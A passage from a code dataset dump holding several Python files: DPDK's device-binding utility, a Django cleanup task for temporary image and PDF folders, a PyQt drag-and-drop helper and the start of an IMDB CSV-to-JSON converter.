None}\ncavium_sso = {'Class': '08', 'Vendor': '177d', 'Device': 'a04b,a04d',\n 'SVendor': None, 'SDevice': None}\ncavium_fpa = {'Class': '08', 'Vendor': '177d', 'Device': 'a053',\n 'SVendor': None, 'SDevice': None}\ncavium_pkx = {'Class': '08', 'Vendor': '177d', 'Device': 'a0dd,a049',\n 'SVendor': None, 'SDevice': None}\ncavium_tim = {'Class': '08', 'Vendor': '177d', 'Device': 'a051',\n 'SVendor': None, 'SDevice': None}\ncavium_zip = {'Class': '12', 'Vendor': '177d', 'Device': 'a037',\n 'SVendor': None, 'SDevice': None}\navp_vnic = {'Class': '05', 'Vendor': '1af4', 'Device': '1110',\n 'SVendor': None, 'SDevice': None}\n\ncnxk_bphy = {'Class': '08', 'Vendor': '177d', 'Device': 'a089',\n 'SVendor': None, 'SDevice': None}\ncnxk_bphy_cgx = {'Class': '08', 'Vendor': '177d', 'Device': 'a059,a060',\n 'SVendor': None, 'SDevice': None}\ncnxk_dma = {'Class': '08', 'Vendor': '177d', 'Device': 'a081',\n 'SVendor': None, 'SDevice': None}\ncnxk_inl_dev = {'Class': '08', 'Vendor': '177d', 'Device': 'a0f0,a0f1',\n 'SVendor': None, 'SDevice': None}\n\nhisilicon_dma = {'Class': '08', 'Vendor': '19e5', 'Device': 'a122',\n 'SVendor': None, 'SDevice': None}\n\nintel_dlb = {'Class': '0b', 'Vendor': '8086', 'Device': '270b,2710,2714',\n 'SVendor': None, 'SDevice': None}\nintel_ioat_bdw = {'Class': '08', 'Vendor': '8086',\n 'Device': '6f20,6f21,6f22,6f23,6f24,6f25,6f26,6f27,6f2e,6f2f',\n 
'SVendor': None, 'SDevice': None}\nintel_ioat_skx = {'Class': '08', 'Vendor': '8086', 'Device': '2021',\n 'SVendor': None, 'SDevice': None}\nintel_ioat_icx = {'Class': '08', 'Vendor': '8086', 'Device': '0b00',\n 'SVendor': None, 'SDevice': None}\nintel_idxd_spr = {'Class': '08', 'Vendor': '8086', 'Device': '0b25',\n 'SVendor': None, 'SDevice': None}\nintel_ntb_skx = {'Class': '06', 'Vendor': '8086', 'Device': '201c',\n 'SVendor': None, 'SDevice': None}\nintel_ntb_icx = {'Class': '06', 'Vendor': '8086', 'Device': '347e',\n 'SVendor': None, 'SDevice': None}\n\ncnxk_sso = {'Class': '08', 'Vendor': '177d', 'Device': 'a0f9,a0fa',\n 'SVendor': None, 'SDevice': None}\ncnxk_npa = {'Class': '08', 'Vendor': '177d', 'Device': 'a0fb,a0fc',\n 'SVendor': None, 'SDevice': None}\ncn9k_ree = {'Class': '08', 'Vendor': '177d', 'Device': 'a0f4',\n 'SVendor': None, 'SDevice': None}\n\nvirtio_blk = {'Class': '01', 'Vendor': \"1af4\", 'Device': '1001,1042',\n 'SVendor': None, 'SDevice': None}\n\nnetwork_devices = [network_class, cavium_pkx, avp_vnic, ifpga_class]\nbaseband_devices = [acceleration_class]\ncrypto_devices = [encryption_class, intel_processor_class]\ndma_devices = [cnxk_dma, hisilicon_dma,\n intel_idxd_spr, intel_ioat_bdw, intel_ioat_icx, intel_ioat_skx]\neventdev_devices = [cavium_sso, cavium_tim, intel_dlb, cnxk_sso]\nmempool_devices = [cavium_fpa, cnxk_npa]\ncompress_devices = [cavium_zip]\nregex_devices = [cn9k_ree]\nmisc_devices = [cnxk_bphy, cnxk_bphy_cgx, cnxk_inl_dev,\n intel_ntb_skx, intel_ntb_icx,\n virtio_blk]\n\n# global dict ethernet devices present. Dictionary indexed by PCI address.\n# Each device within this is itself a dictionary of device properties\ndevices = {}\n# list of supported DPDK drivers\ndpdk_drivers = [\"igb_uio\", \"vfio-pci\", \"uio_pci_generic\"]\n# list of currently loaded kernel modules\nloaded_modules = None\n\n# command-line arg flags\nb_flag = None\nstatus_flag = False\nforce_flag = False\nargs = []\n\n\n# check if a specific kernel module is loaded\ndef module_is_loaded(module):\n global loaded_modules\n\n if module == 'vfio_pci':\n module = 'vfio-pci'\n\n if loaded_modules:\n return module in loaded_modules\n\n # Get list of sysfs modules (both built-in and dynamically loaded)\n sysfs_path = '/sys/module/'\n\n # Get the list of directories in sysfs_path\n sysfs_mods = [m for m in os.listdir(sysfs_path)\n if os.path.isdir(os.path.join(sysfs_path, m))]\n\n # special case for vfio_pci (module is named vfio-pci,\n # but its .ko is named vfio_pci)\n sysfs_mods = [a if a != 'vfio_pci' else 'vfio-pci' for a in sysfs_mods]\n\n loaded_modules = sysfs_mods\n\n # add built-in modules as loaded\n release = platform.uname().release\n filename = os.path.join(\"/lib/modules/\", release, \"modules.builtin\")\n if os.path.exists(filename):\n try:\n with open(filename) as f:\n loaded_modules += [os.path.splitext(os.path.basename(mod))[0] for mod in f]\n except IOError:\n print(\"Warning: cannot read list of built-in kernel modules\")\n\n return module in loaded_modules\n\n\ndef check_modules():\n '''Checks that igb_uio is loaded'''\n global dpdk_drivers\n\n # list of supported modules\n mods = [{\"Name\": driver, \"Found\": False} for driver in dpdk_drivers]\n\n # first check if module is loaded\n for mod in mods:\n if module_is_loaded(mod[\"Name\"]):\n mod[\"Found\"] = True\n\n # check if we have at least one loaded module\n if True not in [mod[\"Found\"] for mod in mods] and b_flag is not None:\n print(\"Warning: no supported DPDK kernel modules are loaded\", 
file=sys.stderr)\n\n # change DPDK driver list to only contain drivers that are loaded\n dpdk_drivers = [mod[\"Name\"] for mod in mods if mod[\"Found\"]]\n\n\ndef has_driver(dev_id):\n '''return true if a device is assigned to a driver. False otherwise'''\n return \"Driver_str\" in devices[dev_id]\n\n\ndef get_pci_device_details(dev_id, probe_lspci):\n '''This function gets additional details for a PCI device'''\n device = {}\n\n if probe_lspci:\n extra_info = subprocess.check_output([\"lspci\", \"-vmmks\", dev_id]).splitlines()\n # parse lspci details\n for line in extra_info:\n if not line:\n continue\n name, value = line.decode(\"utf8\").split(\"\\t\", 1)\n name = name.strip(\":\") + \"_str\"\n device[name] = value\n # check for a unix interface name\n device[\"Interface\"] = \"\"\n for base, dirs, _ in os.walk(\"/sys/bus/pci/devices/%s/\" % dev_id):\n if \"net\" in dirs:\n device[\"Interface\"] = \\\n \",\".join(os.listdir(os.path.join(base, \"net\")))\n break\n # check if a port is used for ssh connection\n device[\"Ssh_if\"] = False\n device[\"Active\"] = \"\"\n\n return device\n\n\ndef clear_data():\n '''This function clears any old data'''\n global devices\n devices = {}\n\n\ndef get_device_details(devices_type):\n '''This function populates the \"devices\" dictionary. The keys used are\n the pci addresses (domain:bus:slot.func). The values are themselves\n dictionaries - one for each NIC.'''\n global devices\n global dpdk_drivers\n\n # first loop through and read details for all devices\n # request machine readable format, with numeric IDs and String\n dev = {}\n dev_lines = subprocess.check_output([\"lspci\", \"-Dvmmnnk\"]).splitlines()\n for dev_line in dev_lines:\n if not dev_line:\n if device_type_match(dev, devices_type):\n # Replace \"Driver\" with \"Driver_str\" to have consistency of\n # of dictionary key names\n if \"Driver\" in dev.keys():\n dev[\"Driver_str\"] = dev.pop(\"Driver\")\n if \"Module\" in dev.keys():\n dev[\"Module_str\"] = dev.pop(\"Module\")\n # use dict to make copy of dev\n devices[dev[\"Slot\"]] = dict(dev)\n # Clear previous device's data\n dev = {}\n else:\n name, value = dev_line.decode(\"utf8\").split(\"\\t\", 1)\n value_list = value.rsplit(' ', 1)\n if value_list:\n # String stored in _str\n dev[name.rstrip(\":\") + '_str'] = value_list[0]\n # Numeric IDs\n dev[name.rstrip(\":\")] = value_list[len(value_list) - 1] \\\n .rstrip(\"]\").lstrip(\"[\")\n\n if devices_type == network_devices:\n # check what is the interface if any for an ssh connection if\n # any to this host, so we can mark it later.\n ssh_if = []\n route = subprocess.check_output([\"ip\", \"-o\", \"route\"])\n # filter out all lines for 169.254 routes\n route = \"\\n\".join(filter(lambda ln: not ln.startswith(\"169.254\"),\n route.decode().splitlines()))\n rt_info = route.split()\n for i in range(len(rt_info) - 1):\n if rt_info[i] == \"dev\":\n ssh_if.append(rt_info[i + 1])\n\n # based on the basic info, get extended text details\n for d in devices.keys():\n if not device_type_match(devices[d], devices_type):\n continue\n\n # get additional info and add it to existing data\n devices[d] = devices[d].copy()\n # No need to probe lspci\n devices[d].update(get_pci_device_details(d, False).items())\n\n if devices_type == network_devices:\n for _if in ssh_if:\n if _if in devices[d][\"Interface\"].split(\",\"):\n devices[d][\"Ssh_if\"] = True\n devices[d][\"Active\"] = \"*Active*\"\n break\n\n # add igb_uio to list of supporting modules if needed\n if \"Module_str\" in devices[d]:\n for driver 
in dpdk_drivers:\n if driver not in devices[d][\"Module_str\"]:\n devices[d][\"Module_str\"] = \\\n devices[d][\"Module_str\"] + \",%s\" % driver\n else:\n devices[d][\"Module_str\"] = \",\".join(dpdk_drivers)\n\n # make sure the driver and module strings do not have any duplicates\n if has_driver(d):\n modules = devices[d][\"Module_str\"].split(\",\")\n if devices[d][\"Driver_str\"] in modules:\n modules.remove(devices[d][\"Driver_str\"])\n devices[d][\"Module_str\"] = \",\".join(modules)\n\n\ndef device_type_match(dev, devices_type):\n for i in range(len(devices_type)):\n param_count = len(\n [x for x in devices_type[i].values() if x is not None])\n match_count = 0\n if dev[\"Class\"][0:2] == devices_type[i][\"Class\"]:\n match_count = match_count + 1\n for key in devices_type[i].keys():\n if key != 'Class' and devices_type[i][key]:\n value_list = devices_type[i][key].split(',')\n for value in value_list:\n if value.strip(' ') == dev[key]:\n match_count = match_count + 1\n # count must be the number of non None parameters to match\n if match_count == param_count:\n return True\n return False\n\n\ndef dev_id_from_dev_name(dev_name):\n '''Take a device \"name\" - a string passed in by user to identify a NIC\n device, and determine the device id - i.e. the domain:bus:slot.func - for\n it, which can then be used to index into the devices array'''\n\n # check if it's already a suitable index\n if dev_name in devices:\n return dev_name\n # check if it's an index just missing the domain part\n if \"0000:\" + dev_name in devices:\n return \"0000:\" + dev_name\n\n # check if it's an interface name, e.g. eth1\n for d in devices.keys():\n if dev_name in devices[d][\"Interface\"].split(\",\"):\n return devices[d][\"Slot\"]\n # if nothing else matches - error\n raise ValueError(\"Unknown device: %s. \"\n \"Please specify device in \\\"bus:slot.func\\\" format\" % dev_name)\n\n\ndef unbind_one(dev_id, force):\n '''Unbind the device identified by \"dev_id\" from its current driver'''\n dev = devices[dev_id]\n if not has_driver(dev_id):\n print(\"Notice: %s %s %s is not currently managed by any driver\" %\n (dev[\"Slot\"], dev[\"Device_str\"], dev[\"Interface\"]), file=sys.stderr)\n return\n\n # prevent us disconnecting ourselves\n if dev[\"Ssh_if\"] and not force:\n print(\"Warning: routing table indicates that interface %s is active. \"\n \"Skipping unbind\" % dev_id, file=sys.stderr)\n return\n\n # write to /sys to unbind\n filename = \"/sys/bus/pci/drivers/%s/unbind\" % dev[\"Driver_str\"]\n try:\n f = open(filename, \"a\")\n except OSError as err:\n sys.exit(\"Error: unbind failed for %s - Cannot open %s: %s\" %\n (dev_id, filename, err))\n f.write(dev_id)\n f.close()\n\n\ndef bind_one(dev_id, driver, force):\n '''Bind the device given by \"dev_id\" to the driver \"driver\". If the device\n is already bound to a different driver, it will be unbound first'''\n dev = devices[dev_id]\n saved_driver = None # used to rollback any unbind in case of failure\n\n # prevent disconnection of our ssh session\n if dev[\"Ssh_if\"] and not force:\n print(\"Warning: routing table indicates that interface %s is active. 
\"\n \"Not modifying\" % dev_id, file=sys.stderr)\n return\n\n # unbind any existing drivers we don't want\n if has_driver(dev_id):\n if dev[\"Driver_str\"] == driver:\n print(\"Notice: %s already bound to driver %s, skipping\" %\n (dev_id, driver), file=sys.stderr)\n return\n saved_driver = dev[\"Driver_str\"]\n unbind_one(dev_id, force)\n dev[\"Driver_str\"] = \"\" # clear driver string\n\n # For kernels >= 3.15 driver_override can be used to specify the driver\n # for a device rather than relying on the driver to provide a positive\n # match of the device. The existing process of looking up\n # the vendor and device ID, adding them to the driver new_id,\n # will erroneously bind other devices too which has the additional burden\n # of unbinding those devices\n if driver in dpdk_drivers:\n filename = \"/sys/bus/pci/devices/%s/driver_override\" % dev_id\n if exists(filename):\n try:\n f = open(filename, \"w\")\n except OSError as err:\n print(\"Error: bind failed for %s - Cannot open %s: %s\"\n % (dev_id, filename, err), file=sys.stderr)\n return\n try:\n f.write(\"%s\" % driver)\n f.close()\n except OSError as err:\n print(\"Error: bind failed for %s - Cannot write driver %s to \"\n \"PCI ID: %s\" % (dev_id, driver, err), file=sys.stderr)\n return\n # For kernels < 3.15 use new_id to add PCI id's to the driver\n else:\n filename = \"/sys/bus/pci/drivers/%s/new_id\" % driver\n try:\n f = open(filename, \"w\")\n except OSError as err:\n print(\"Error: bind failed for %s - Cannot open %s: %s\"\n % (dev_id, filename, err), file=sys.stderr)\n return\n try:\n # Convert Device and Vendor Id to int to write to new_id\n f.write(\"%04x %04x\" % (int(dev[\"Vendor\"], 16),\n int(dev[\"Device\"], 16)))\n f.close()\n except OSError as err:\n print(\"Error: bind failed for %s - Cannot write new PCI ID to \"\n \"driver %s: %s\" % (dev_id, driver, err), file=sys.stderr)\n return\n\n # do the bind by writing to /sys\n filename = \"/sys/bus/pci/drivers/%s/bind\" % driver\n try:\n f = open(filename, \"a\")\n except OSError as err:\n print(\"Error: bind failed for %s - Cannot open %s: %s\"\n % (dev_id, filename, err), file=sys.stderr)\n if saved_driver is not None: # restore any previous driver\n bind_one(dev_id, saved_driver, force)\n return\n try:\n f.write(dev_id)\n f.close()\n except OSError as err:\n # for some reason, closing dev_id after adding a new PCI ID to new_id\n # results in IOError. 
however, if the device was successfully bound,\n # we don't care for any errors and can safely ignore IOError\n tmp = get_pci_device_details(dev_id, True)\n if \"Driver_str\" in tmp and tmp[\"Driver_str\"] == driver:\n return\n print(\"Error: bind failed for %s - Cannot bind to driver %s: %s\"\n % (dev_id, driver, err), file=sys.stderr)\n if saved_driver is not None: # restore any previous driver\n bind_one(dev_id, saved_driver, force)\n return\n\n # For kernels > 3.15 driver_override is used to bind a device to a driver.\n # Before unbinding it, overwrite driver_override with empty string so that\n # the device can be bound to any other driver\n filename = \"/sys/bus/pci/devices/%s/driver_override\" % dev_id\n if exists(filename):\n try:\n f = open(filename, \"w\")\n except OSError as err:\n sys.exit(\"Error: unbind failed for %s - Cannot open %s: %s\"\n % (dev_id, filename, err))\n try:\n f.write(\"\\00\")\n f.close()\n except OSError as err:\n sys.exit(\"Error: unbind failed for %s - Cannot write %s: %s\"\n % (dev_id, filename, err))\n\n\ndef unbind_all(dev_list, force=False):\n \"\"\"Unbind method, takes a list of device locations\"\"\"\n\n if dev_list[0] == \"dpdk\":\n for d in devices.keys():\n if \"Driver_str\" in devices[d]:\n if devices[d][\"Driver_str\"] in dpdk_drivers:\n unbind_one(devices[d][\"Slot\"], force)\n return\n\n try:\n dev_list = map(dev_id_from_dev_name, dev_list)\n except ValueError as ex:\n print(ex)\n sys.exit(1)\n\n for d in dev_list:\n unbind_one(d, force)\n\n\ndef bind_all(dev_list, driver, force=False):\n \"\"\"Bind method, takes a list of device locations\"\"\"\n global devices\n\n # a common user error is to forget to specify the driver the devices need to\n # be bound to. check if the driver is a valid device, and if it is, show\n # a meaningful error.\n try:\n dev_id_from_dev_name(driver)\n # if we've made it this far, this means that the \"driver\" was a valid\n # device string, so it's probably not a valid driver name.\n sys.exit(\"Error: Driver '%s' does not look like a valid driver. \"\n \"Did you forget to specify the driver to bind devices to?\" % driver)\n except ValueError:\n # driver generated error - it's not a valid device ID, so all is well\n pass\n\n # check if we're attempting to bind to a driver that isn't loaded\n if not module_is_loaded(driver.replace('-', '_')):\n sys.exit(\"Error: Driver '%s' is not loaded.\" % driver)\n\n try:\n dev_list = map(dev_id_from_dev_name, dev_list)\n except ValueError as ex:\n sys.exit(ex)\n\n for d in dev_list:\n bind_one(d, driver, force)\n\n # For kernels < 3.15 when binding devices to a generic driver\n # (i.e. one that doesn't have a PCI ID table) using new_id, some devices\n # that are not bound to any other driver could be bound even if no one has\n # asked them to. 
hence, we check the list of drivers again, and see if\n # some of the previously-unbound devices were erroneously bound.\n if not exists(\"/sys/bus/pci/devices/%s/driver_override\" % d):\n for d in devices.keys():\n # skip devices that were already bound or that we know should be bound\n if \"Driver_str\" in devices[d] or d in dev_list:\n continue\n\n # update information about this device\n devices[d] = dict(devices[d].items()\n + get_pci_device_details(d, True).items())\n\n # check if updated information indicates that the device was bound\n if \"Driver_str\" in devices[d]:\n unbind_one(d, force)\n\n\ndef display_devices(title, dev_list, extra_params=None):\n '''Displays to the user the details of a list of devices given in\n \"dev_list\". The \"extra_params\" parameter, if given, should contain a string\n with %()s fields in it for replacement by the named fields in each\n device's dictionary.'''\n strings = [] # this holds the strings to print. We sort before printing\n print(\"\\n%s\" % title)\n print(\"=\" * len(title))\n if not dev_list:\n strings.append(\"\")\n else:\n for dev in dev_list:\n if extra_params is not None:\n strings.append(\"%s '%s %s' %s\" % (dev[\"Slot\"],\n dev[\"Device_str\"],\n dev[\"Device\"],\n extra_params % dev))\n else:\n strings.append(\"%s '%s'\" % (dev[\"Slot\"], dev[\"Device_str\"]))\n # sort before printing, so that the entries appear in PCI order\n strings.sort()\n print(\"\\n\".join(strings)) # print one per line\n\n\ndef show_device_status(devices_type, device_name, if_field=False):\n global dpdk_drivers\n kernel_drv = []\n dpdk_drv = []\n no_drv = []\n\n # split our list of network devices into the three categories above\n for d in devices.keys():\n if device_type_match(devices[d], devices_type):\n if not has_driver(d):\n no_drv.append(devices[d])\n continue\n if devices[d][\"Driver_str\"] in dpdk_drivers:\n dpdk_drv.append(devices[d])\n else:\n kernel_drv.append(devices[d])\n\n n_devs = len(dpdk_drv) + len(kernel_drv) + len(no_drv)\n\n # don't bother displaying anything if there are no devices\n if n_devs == 0:\n msg = \"No '%s' devices detected\" % device_name\n print(\"\")\n print(msg)\n print(\"\".join('=' * len(msg)))\n return\n\n # print each category separately, so we can clearly see what's used by DPDK\n if dpdk_drv:\n display_devices(\"%s devices using DPDK-compatible driver\" % device_name,\n dpdk_drv, \"drv=%(Driver_str)s unused=%(Module_str)s\")\n if kernel_drv:\n if_text = \"\"\n if if_field:\n if_text = \"if=%(Interface)s \"\n display_devices(\"%s devices using kernel driver\" % device_name, kernel_drv,\n if_text + \"drv=%(Driver_str)s \"\n \"unused=%(Module_str)s %(Active)s\")\n if no_drv:\n display_devices(\"Other %s devices\" % device_name, no_drv,\n \"unused=%(Module_str)s\")\n\n\ndef show_status():\n '''Function called when the script is passed the \"--status\" option.\n Displays to the user what devices are bound to the igb_uio driver, the\n kernel driver or to no driver'''\n\n if status_dev in [\"net\", \"all\"]:\n show_device_status(network_devices, \"Network\", if_field=True)\n\n if status_dev in [\"baseband\", \"all\"]:\n show_device_status(baseband_devices, \"Baseband\")\n\n if status_dev in [\"crypto\", \"all\"]:\n show_device_status(crypto_devices, \"Crypto\")\n\n if status_dev in [\"dma\", \"all\"]:\n show_device_status(dma_devices, \"DMA\")\n\n if status_dev in [\"event\", \"all\"]:\n show_device_status(eventdev_devices, \"Eventdev\")\n\n if status_dev in [\"mempool\", \"all\"]:\n show_device_status(mempool_devices, 
\"Mempool\")\n\n if status_dev in [\"compress\", \"all\"]:\n show_device_status(compress_devices, \"Compress\")\n\n if status_dev in [\"misc\", \"all\"]:\n show_device_status(misc_devices, \"Misc (rawdev)\")\n\n if status_dev in [\"regex\", \"all\"]:\n show_device_status(regex_devices, \"Regex\")\n\n\ndef pci_glob(arg):\n '''Returns a list containing either:\n * List of PCI B:D:F matching arg, using shell wildcards e.g. 80:04.*\n * Only the passed arg if matching list is empty'''\n sysfs_path = \"/sys/bus/pci/devices\"\n for _glob in [arg, '0000:' + arg]:\n paths = [basename(path) for path in glob(path_join(sysfs_path, _glob))]\n if paths:\n return paths\n return [arg]\n\n\ndef parse_args():\n '''Parses the command-line arguments given by the user and takes the\n appropriate action for each'''\n global b_flag\n global status_flag\n global status_dev\n global force_flag\n global args\n\n parser = argparse.ArgumentParser(\n description='Utility to bind and unbind devices from Linux kernel',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"\"\"\nExamples:\n---------\n\nTo display current device status:\n %(prog)s --status\n\nTo display current network device status:\n %(prog)s --status-dev net\n\nTo bind eth1 from the current driver and move to use vfio-pci\n %(prog)s --bind=vfio-pci eth1\n\nTo unbind 0000:01:00.0 from using any driver\n %(prog)s -u 0000:01:00.0\n\nTo bind 0000:02:00.0 and 0000:02:00.1 to the ixgbe kernel driver\n %(prog)s -b ixgbe 02:00.0 02:00.1\n\"\"\")\n\n parser.add_argument(\n '-s',\n '--status',\n action='store_true',\n help=\"Print the current status of all known devices.\")\n parser.add_argument(\n '--status-dev',\n help=\"Print the status of given device group.\",\n choices=['baseband', 'compress', 'crypto', 'dma', 'event',\n 'mempool', 'misc', 'net', 'regex'])\n bind_group = parser.add_mutually_exclusive_group()\n bind_group.add_argument(\n '-b',\n '--bind',\n metavar='DRIVER',\n help=\"Select the driver to use or \\\"none\\\" to unbind the device\")\n bind_group.add_argument(\n '-u',\n '--unbind',\n action='store_true',\n help=\"Unbind a device (equivalent to \\\"-b none\\\")\")\n parser.add_argument(\n '--force',\n action='store_true',\n help=\"\"\"\nOverride restriction on binding devices in use by Linux\"\nWARNING: This can lead to loss of network connection and should be used with caution.\n\"\"\")\n parser.add_argument(\n 'devices',\n metavar='DEVICE',\n nargs='*',\n help=\"\"\"\nDevice specified as PCI \"domain:bus:slot.func\" syntax or \"bus:slot.func\" syntax.\nFor devices bound to Linux kernel drivers, they may be referred to by interface name.\n\"\"\")\n\n opt = parser.parse_args()\n\n if opt.status_dev:\n status_flag = True\n status_dev = opt.status_dev\n if opt.status:\n status_flag = True\n status_dev = \"all\"\n if opt.force:\n force_flag = True\n if opt.bind:\n b_flag = opt.bind\n elif opt.unbind:\n b_flag = \"none\"\n args = opt.devices\n\n if not b_flag and not status_flag:\n print(\"Error: No action specified for devices. 
\"\n \"Please give a --bind, --ubind or --status option\",\n file=sys.stderr)\n parser.print_usage()\n sys.exit(1)\n\n if b_flag and not args:\n print(\"Error: No devices specified.\", file=sys.stderr)\n parser.print_usage()\n sys.exit(1)\n\n # resolve any PCI globs in the args\n new_args = []\n for arg in args:\n new_args.extend(pci_glob(arg))\n args = new_args\n\n\ndef do_arg_actions():\n '''do the actual action requested by the user'''\n global b_flag\n global status_flag\n global force_flag\n global args\n\n if b_flag in [\"none\", \"None\"]:\n unbind_all(args, force_flag)\n elif b_flag is not None:\n bind_all(args, b_flag, force_flag)\n if status_flag:\n if b_flag is not None:\n clear_data()\n # refresh if we have changed anything\n get_device_details(network_devices)\n get_device_details(baseband_devices)\n get_device_details(crypto_devices)\n get_device_details(dma_devices)\n get_device_details(eventdev_devices)\n get_device_details(mempool_devices)\n get_device_details(compress_devices)\n get_device_details(regex_devices)\n get_device_details(misc_devices)\n show_status()\n\n\ndef main():\n '''program main function'''\n # check if lspci is installed, suppress any output\n with open(os.devnull, 'w') as devnull:\n ret = subprocess.call(['which', 'lspci'],\n stdout=devnull, stderr=devnull)\n if ret != 0:\n sys.exit(\"'lspci' not found - please install 'pciutils'\")\n parse_args()\n check_modules()\n clear_data()\n get_device_details(network_devices)\n get_device_details(baseband_devices)\n get_device_details(crypto_devices)\n get_device_details(dma_devices)\n get_device_details(eventdev_devices)\n get_device_details(mempool_devices)\n get_device_details(compress_devices)\n get_device_details(regex_devices)\n get_device_details(misc_devices)\n do_arg_actions()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"F-Stack/f-stack","sub_path":"dpdk/usertools/dpdk-devbind.py","file_name":"dpdk-devbind.py","file_ext":"py","file_size_in_byte":29461,"program_lang":"python","lang":"en","doc_type":"code","stars":3600,"dataset":"github-code","pt":"54"} +{"seq_id":"22376927729","text":"import os\nfrom pathlib import Path\nBASE_DIR = Path(__file__).resolve().parent.parent\n\ndef ImagetopdfDeleteImagesTrigger():\n print(\"ImagetopdfDeleteImagesTrigger triggered\")\n dir = os.path.join(BASE_DIR,'imagetopdf/files/images')\n for f in os.listdir(dir):\n os.remove(os.path.join(dir, f))\n print(\"ImagetopdfDeleteImagesTrigger completed\")\n \n\ndef ImagetopdfDeletePDFTrigger():\n print(\"ImagetopdfDeletePDFTrigger triggered\")\n dir = os.path.join(BASE_DIR,'imagetopdf/files/pdfs')\n for f in os.listdir(dir):\n os.remove(os.path.join(dir, f))\n print(\"ImagetopdfDeletePDFTrigger completed\")","repo_name":"saint-mantis/nb-1","sub_path":"imagetopdf/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"35002367406","text":"from pathlib import PurePath\n\nimport PyQt5.QtCore as qcore\nimport PyQt5.QtGui as qgui\nimport PyQt5.QtWidgets as qt\n\nclass DragDropHandler():\n \"\"\"This class provides a higher-level wrapper around the Qt drag and\n drop event handlers. 
This class can be inhereited so it can make\n use of methods that let you easily activate or deactivate QWidiget\n event handlers that can respond to dropping files from some other\n application in the operating system into your GUIs window.\n\n If you inherit from this class, you MUST also inherit from QWidget\n or a child of QWidget. That is because the \"setAcceptsDrops()\"\n method is called by the methods in this class.\n\n There are two methods you should override:\n\n - 'drop_url_handler(urls)' which takes a list of QUrl objects as\n an argument.\n\n - 'drop_text_handler(text)' which takes a string as an argument.\n\n Any class that inherits from this class will be able to enable or\n disable drag and drop, by simply calling the\n 'enable_drop_handlers()' method. You can also enable or disable\n each handler individually, however it is best to enable both or\n neither, since the operating system may not recognize file paths\n as URLs and input them to the program as text instead. Your\n program should be ready to handle either situation.\n \"\"\"\n\n def __init__(self):\n self._drop_url_handler = False\n self._drop_text_handler = False\n\n def reset_accepts_drops(self):\n enable = self._drop_text_handler or self._drop_url_handler\n #print(f'DragDropHandler.reset_accepts_drops() #( {self}.setAcceptDrops({enable}) )')\n self.setAcceptDrops(enable)\n\n def drop_url_handler(self, urls):\n \"\"\"This is the default event handler that does nothing but print a log\n message.\"\"\"\n print(f'DragDropHandler.drop_url_handler() #(urls: {urls})')\n\n def drop_text_handler(self, text):\n \"\"\"This is the default event handler that does nothing but print a log\n message.\"\"\"\n print(f'DragDropHandler.drop_url_handler() #(text: \"{text}\")')\n\n def enable_drop_text_handler(self, boolean):\n self._drop_text_handler = boolean\n self.reset_accept_drops()\n\n def enable_drop_url_handler(self, boolean):\n self._drop_url_handler = boolean\n self.reset_accept_drops()\n\n def enable_drop_handlers(self, boolean):\n \"\"\"Enable both URL and text drop handlers at once. This function\n assumes you have overridden the drop_text_handler() and\n drop_url_handler() methods.\n\n \"\"\"\n self._drop_url_handler = boolean\n self._drop_text_handler = boolean\n self.reset_accepts_drops()\n\n def dragEnterEvent(self, event):\n #print(f'DragDropHandler.dragEnterEvent() #(self = {self})')\n mime_data = event.mimeData()\n if mime_data.hasUrls():\n urls = mime_data.urls()\n if len(urls) > 0:\n return event.accept()\n else:\n #print(f'DragDropHandler.dragEnterEvent() #(len(urls) <= 0: ignore)')\n return event.ignore()\n elif mime_data.hasText():\n return event.accept()\n else:\n #print(f'DragDropHandler.dragEnterEvent() #(mime_data: hasUrls() -> False, hasText() -> False)')\n return event.ignore()\n\n def dragMoveEvent(self, event):\n # I do not know why, but unless this overridden method accepts\n # all events, drag and drop does not work properly.\n # Fortunately, this event handler is not triggered anyway if\n # the dragEnterEvent() method above evaluates\n # \"event.ignore()\", so there is no need to run all the checks\n # on the event again. 
Just evaluate \"event.accept()\".\n return event.accept()\n\n def dropEvent(self, event):\n #print(f'DragDropHandler.dropEvent() #(self = {self})')\n mime_data = event.mimeData()\n if mime_data.hasUrls() and self._drop_url_handler:\n urls = mime_data.urls()\n urls = list(\n map(( lambda url: \\\n PurePath(url.toLocalFile()) if \\\n url.isLocalFile() else \\\n url\n ),\n urls,\n ),\n )\n #print(f'DragDropHandler.dropEvent() #(urls: {urls})')\n return self.drop_url_handler(urls)\n elif mime_data.hasText() and self._drop_text_handler:\n text = mime_data.text()\n #print(f'DragDropHandler.dropEvent() #(text: {text})')\n event.accept()\n return self.drop_text_handler(text)\n else:\n #print(f'DragDropHandler.dropEvent() #( event.ignore() )')\n return event.ignore()\n","repo_name":"ramin-honary-xc/data-prep-kit","sub_path":"DataPrepKit/DragDropHandler.py","file_name":"DragDropHandler.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2958253576","text":"#!/usr/bin/python\n# -*- encoding: utf-8 -*-\nimport os\nimport json\nimport csv\n\nclass IMDBMovieJson():\n def __init__(self, filename):\n self.filename = filename\n self.file = open( filename, 'r' )\n\n def convert_csv_to_json(self):\n\n header = self.file.readline().replace(\".\", \"\")\n reader = csv.DictReader( self.file, fieldnames = ( header.replace(\"\\\"\", \"\").split(\",\") ) )\n\n movie_list = []\n username = \"\"\n\n for row in reader:\n username = self.__find_username(row)\n\n row[\"rated\"] = int(row[username])\n \n #this just because the Moneyball doesn't come with rate\n row[\"IMDb Rating\"] = 7 if row[\"IMDb Rating\"] is \"\" else float(row[\"IMDb Rating\"])\n #row[\"IMDb Rating\"] = float(row[\"IMDb Rating\"])\n\n row[\"Runtime (mins)\"] = 0 if row[\"Runtime (mins)\"] is \"\" else int(row[\"Runtime (mins)\"])\n movie_list.append(row)\n\n '''\n Actors\n '''\n\n '''\n import urllib2\n imdb_id = row[\"const\"]\n link = \"http://www.omdbapi.com/?i=\"+imdb_id\n response = urllib2.urlopen(link)\n movie_data = response.read()\n #print json.loads(movie_data).get(\"Actors\")\n row[\"actors\"] = json.loads(movie_data).get(\"Actors\")\n '''\n\n '''\n import urllib2\n imdb_id = row[\"const\"]\n link = \"http://mymovieapi.com/?type=json&id=\"+imdb_id\n response = urllib2.urlopen(link)\n movie_data = response.read()\n #print json.loads(movie_data).get(\"actors\")\n row[\"actors\"] = 